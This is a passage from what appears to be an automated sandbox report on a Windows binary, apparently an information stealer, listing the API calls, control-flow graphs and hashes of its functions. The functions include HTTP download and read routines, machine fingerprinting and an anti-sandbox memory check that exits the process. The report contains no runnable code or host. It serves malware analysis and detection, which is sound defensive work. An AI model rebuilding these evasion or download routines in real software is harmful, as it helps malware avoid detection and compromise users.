                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 1c1ba5b345b4fc062b1b71df569571ce595a105088639f07bd9b214000c73b38
                          • Instruction ID: 0b39cee28b3d06a9fae62e81c4519d3b884d24e3d6bd7b36c6f852fef71c5990
                          • Opcode Fuzzy Hash: 1c1ba5b345b4fc062b1b71df569571ce595a105088639f07bd9b214000c73b38
                          • Instruction Fuzzy Hash: 07A28130A012069FCB26DF69DC48AAAB7F5EF45308F19907EE909DBA61DB31DC45CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0013
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C00BD
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C00E1
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C00EC
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0110
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C011B
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C013F
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C015A
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0189
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C0194
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C01C3
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C01CE
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0206
                          • lstrlen.KERNEL32(003CCFEC), ref: 003C0250
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C0288
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C059B
                          • lstrlen.KERNEL32(00F165D8), ref: 003C05AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C05D7
                          • lstrcat.KERNEL32(00000000,?), ref: 003C05E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C060E
                          • lstrlen.KERNEL32(00F2ECC8), ref: 003C0625
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C064C
                          • lstrcat.KERNEL32(00000000,?), ref: 003C0658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C0681
                          • lstrlen.KERNEL32(00F166B8), ref: 003C0698
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C06C9
                          • lstrcat.KERNEL32(00000000,?), ref: 003C06D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C0706
                          • lstrcpy.KERNEL32(00000000,00F29438), ref: 003C074B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C077F
                          • lstrcpy.KERNEL32(00000000,00F2ECE0), ref: 003C07E7
                          • lstrcpy.KERNEL32(00000000,00F29248), ref: 003C0858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 003C08CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C0928
                          • lstrcpy.KERNEL32(00000000,00F290B8), ref: 003C09F8
                            • Part of subcall function 003A24E0: lstrcpy.KERNEL32(00000000,?), ref: 003A2528
                            • Part of subcall function 003A24E0: lstrcpy.KERNEL32(00000000,?), ref: 003A254E
                            • Part of subcall function 003A24E0: lstrcpy.KERNEL32(00000000,?), ref: 003A2577
                          • lstrcpy.KERNEL32(00000000,00F29198), ref: 003C0ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C0B81
                          • lstrcpy.KERNEL32(00000000,00F29198), ref: 003C0D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: ba6ef11e35ba1d86692de2c2b48291ffd33822ff736913c597836d43dafa1005
                          • Instruction ID: 11600615e50263f3d5321d91b9d9280714a11124ad91e151f7ea72465e2eea61
                          • Opcode Fuzzy Hash: ba6ef11e35ba1d86692de2c2b48291ffd33822ff736913c597836d43dafa1005
                          • Instruction Fuzzy Hash: 2DE24871A05341CFD736DF29C488B6ABBE0BF89304F59856EE489CB262DB319C45CB42

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2234 3a6c40-3a6c64 call 3a2930 2237 3a6c66-3a6c6b 2234->2237 2238 3a6c75-3a6c97 call 3a4bc0 2234->2238 2237->2238 2239 3a6c6d-3a6c6f lstrcpy 2237->2239 2242 3a6caa-3a6cba call 3a2930 2238->2242 2243 3a6c99 2238->2243 2239->2238 2247 3a6cc8-3a6cf5 InternetOpenA StrCmpCA 2242->2247 2248 3a6cbc-3a6cc2 lstrcpy 2242->2248 2244 3a6ca0-3a6ca8 2243->2244 2244->2242 2244->2244 2249 3a6cfa-3a6cfc 2247->2249 2250 3a6cf7 2247->2250 2248->2247 2251 3a6ea8-3a6ebb call 3a2930 2249->2251 2252 3a6d02-3a6d22 InternetConnectA 2249->2252 2250->2249 2261 3a6ec9-3a6ee0 call 3a2a20 * 2 2251->2261 2262 3a6ebd-3a6ebf 2251->2262 2253 3a6d28-3a6d5d HttpOpenRequestA 2252->2253 2254 3a6ea1-3a6ea2 InternetCloseHandle 2252->2254 2256 3a6d63-3a6d65 2253->2256 2257 3a6e94-3a6e9e InternetCloseHandle 2253->2257 2254->2251 2259 3a6d7d-3a6dad HttpSendRequestA HttpQueryInfoA 2256->2259 2260 3a6d67-3a6d77 InternetSetOptionA 2256->2260 2257->2254 2263 3a6daf-3a6dd3 call 3c71e0 call 3a2a20 * 2 2259->2263 2264 3a6dd4-3a6de4 call 3c3d90 2259->2264 2260->2259 2262->2261 2265 3a6ec1-3a6ec3 lstrcpy 2262->2265 2264->2263 2275 3a6de6-3a6de8 2264->2275 2265->2261 2277 3a6dee-3a6e07 InternetReadFile 2275->2277 2278 3a6e8d-3a6e8e InternetCloseHandle 2275->2278 2277->2278 2279 3a6e0d 2277->2279 2278->2257 2281 3a6e10-3a6e15 2279->2281 2281->2278 2283 3a6e17-3a6e3d call 3c7310 2281->2283 2286 3a6e3f call 3a2a20 2283->2286 2287 3a6e44-3a6e51 call 3a2930 2283->2287 2286->2287 2291 3a6e53-3a6e57 2287->2291 2292 3a6e61-3a6e8b call 3a2a20 InternetReadFile 2287->2292 2291->2292 2293 3a6e59-3a6e5b lstrcpy 2291->2293 2292->2278 2292->2281 2293->2292
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A6C6F
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A6CC2
                          • InternetOpenA.WININET(003CCFEC,00000001,00000000,00000000,00000000), ref: 003A6CD5
                          • StrCmpCA.SHLWAPI(?,00F2F170), ref: 003A6CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003A6D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,00F2ED88,00000000,00000000,-00400100,00000000), ref: 003A6D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 003A6D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003A6D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 003A6DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003A6DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A6E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 003A6E7D
                          • InternetCloseHandle.WININET(00000000), ref: 003A6E8E
                          • InternetCloseHandle.WININET(?), ref: 003A6E98
                          • InternetCloseHandle.WININET(00000000), ref: 003A6EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6EC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: 8ae90e1660d59117c9403bc44a6fa633bec0bb64ab11a783ffef6fd599799f9b
                          • Instruction ID: d6b5ebdd457d182ecf48a913f6bcf0dda7c10f9ace1c92817bd35381b64cfc79
                          • Opcode Fuzzy Hash: 8ae90e1660d59117c9403bc44a6fa633bec0bb64ab11a783ffef6fd599799f9b
                          • Instruction Fuzzy Hash: BA81C275A11216ABDB22DFA4DC4AFAF77B8EF55700F05402AF905EB280DB70AD04CB90
                          APIs
                          • lstrlen.KERNEL32(00F16598), ref: 003BF315
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BF3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BF47B
                          • lstrcpy.KERNEL32(00000000,00F16598), ref: 003BF4BB
                          • lstrcpy.KERNEL32(00000000,00F29348), ref: 003BF4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BF59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003BF61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 003BF718
                          • lstrlen.KERNEL32(00F29358), ref: 003BF746
                          • lstrcpy.KERNEL32(00000000,00F29358), ref: 003BF771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BF793
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 003BFA32
                          • lstrlen.KERNEL32(00F29378), ref: 003BFA60
                          • lstrcpy.KERNEL32(00000000,00F29378), ref: 003BFA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BFAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BFAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 55c63f7408874de6d779d877baa3bcce884491350bdf76029baabe9186e2a873
                          • Instruction ID: 6873a145e76a72d864d510b2973fda42c2b9992d0a568d69bcdac695486c3a14
                          • Opcode Fuzzy Hash: 55c63f7408874de6d779d877baa3bcce884491350bdf76029baabe9186e2a873
                          • Instruction Fuzzy Hash: 63F13D70A02202CFDB26DF69C844AA6B7E5BF54318B1A91BED509DBB61DB31DC46CF40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2721 3b8ca0-3b8cc4 StrCmpCA 2722 3b8ccd-3b8ce6 2721->2722 2723 3b8cc6-3b8cc7 ExitProcess 2721->2723 2725 3b8cec-3b8cf1 2722->2725 2726 3b8ee2-3b8eef call 3a2a20 2722->2726 2728 3b8cf6-3b8cf9 2725->2728 2730 3b8cff 2728->2730 2731 3b8ec3-3b8edc 2728->2731 2732 3b8d5a-3b8d69 lstrlen 2730->2732 2733 3b8dbd-3b8dcb StrCmpCA 2730->2733 2734 3b8ddd-3b8deb StrCmpCA 2730->2734 2735 3b8dfd-3b8e0b StrCmpCA 2730->2735 2736 3b8e1d-3b8e2b StrCmpCA 2730->2736 2737 3b8e3d-3b8e4b StrCmpCA 2730->2737 2738 3b8d30-3b8d3f lstrlen 2730->2738 2739 3b8e56-3b8e64 StrCmpCA 2730->2739 2740 3b8e88-3b8e9a lstrlen 2730->2740 2741 3b8e6f-3b8e7d StrCmpCA 2730->2741 2742 3b8d06-3b8d15 lstrlen 2730->2742 2743 3b8d84-3b8d92 StrCmpCA 2730->2743 2744 3b8da4-3b8db8 StrCmpCA 2730->2744 2731->2726 2763 3b8cf3 2731->2763 2760 3b8d6b-3b8d70 call 3a2a20 2732->2760 2761 3b8d73-3b8d7f call 3a2930 2732->2761 2733->2731 2747 3b8dd1-3b8dd8 2733->2747 2734->2731 2748 3b8df1-3b8df8 2734->2748 2735->2731 2749 3b8e11-3b8e18 2735->2749 2736->2731 2750 3b8e31-3b8e38 2736->2750 2737->2731 2751 3b8e4d-3b8e54 2737->2751 2758 3b8d49-3b8d55 call 3a2930 2738->2758 2759 3b8d41-3b8d46 call 3a2a20 2738->2759 2739->2731 2754 3b8e66-3b8e6d 2739->2754 2756 3b8e9c-3b8ea1 call 3a2a20 2740->2756 2757 3b8ea4-3b8eb0 call 3a2930 2740->2757 2741->2731 2755 3b8e7f-3b8e86 2741->2755 2752 3b8d1f-3b8d2b call 3a2930 2742->2752 2753 3b8d17-3b8d1c call 3a2a20 2742->2753 2743->2731 2746 3b8d98-3b8d9f 2743->2746 2744->2731 2746->2731 2747->2731 2748->2731 2749->2731 2750->2731 2751->2731 2779 3b8eb3-3b8eb5 2752->2779 2753->2752 2754->2731 2755->2731 2756->2757 2757->2779 2758->2779 2759->2758 2760->2761 2761->2779 2763->2728 2779->2731 2780 3b8eb7-3b8eb9 2779->2780 2780->2731 2781 3b8ebb-3b8ebd lstrcpy 2780->2781 2781->2731
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 6721beef599b537b8b526fdd504b78f2a6fd9d22a4be94c10e7cc13df27fe59f
                          • Instruction ID: 212f91645d6d6881541ef18d7c6313119362c7d13016b8f4326b489cc6e88f56
                          • Opcode Fuzzy Hash: 6721beef599b537b8b526fdd504b78f2a6fd9d22a4be94c10e7cc13df27fe59f
                          • Instruction Fuzzy Hash: 02517071A09701ABC722AF75ED88AAB7BFCBB54708B10481EE642D7E10DB74D445DF60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2782 3c2740-3c2783 GetWindowsDirectoryA 2783 3c278c-3c27ea GetVolumeInformationA 2782->2783 2784 3c2785 2782->2784 2785 3c27ec-3c27f2 2783->2785 2784->2783 2786 3c2809-3c2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 3c27f4-3c2807 2785->2787 2788 3c2826-3c2844 wsprintfA 2786->2788 2789 3c2822-3c2824 2786->2789 2787->2785 2790 3c285b-3c2872 call 3c71e0 2788->2790 2789->2790
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 003C277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003B93B6,00000000,00000000,00000000,00000000), ref: 003C27AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C2816
                          • wsprintfA.USER32 ref: 003C283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: 6160d760d7b1e5f751e1a2696bf875a3462479634f8da44de64ef6c56e54dc3f
                          • Instruction ID: cc43893e75ac1fc201365441960fb81110db23d1aec922bc0744d13e07e24d30
                          • Opcode Fuzzy Hash: 6160d760d7b1e5f751e1a2696bf875a3462479634f8da44de64ef6c56e54dc3f
                          • Instruction Fuzzy Hash: EC316DB1909209AFCB15DFB89985AEFBFBCEF58710F10016EE505F7650E2349E408BA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2793 3a4bc0-3a4bce 2794 3a4bd0-3a4bd5 2793->2794 2794->2794 2795 3a4bd7-3a4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 3a2a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 003A4BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 003A4C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 003A4C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 003A4C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 003A4C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 3a9a884b9a02c3411ce0afc09bbdc92bb873d57a7b8b268fc9d1401a6a098c36
                          • Instruction ID: c2fabbd4f6ca49ae1174766388cd79f437a803c376b26fd0c14af86305cfea0e
                          • Opcode Fuzzy Hash: 3a9a884b9a02c3411ce0afc09bbdc92bb873d57a7b8b268fc9d1401a6a098c36
                          • Instruction Fuzzy Hash: DB012971D01218ABDB14DFA8EC45B9EBBB8EB59320F00816AF954E7390EB7499048FD4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2798 3a1030-3a1055 GetCurrentProcess VirtualAllocExNuma 2799 3a105e-3a107b VirtualAlloc 2798->2799 2800 3a1057-3a1058 ExitProcess 2798->2800 2801 3a107d-3a1080 2799->2801 2802 3a1082-3a1088 2799->2802 2801->2802 2803 3a108a-3a10ab VirtualFree 2802->2803 2804 3a10b1-3a10b6 2802->2804 2803->2804
                          APIs
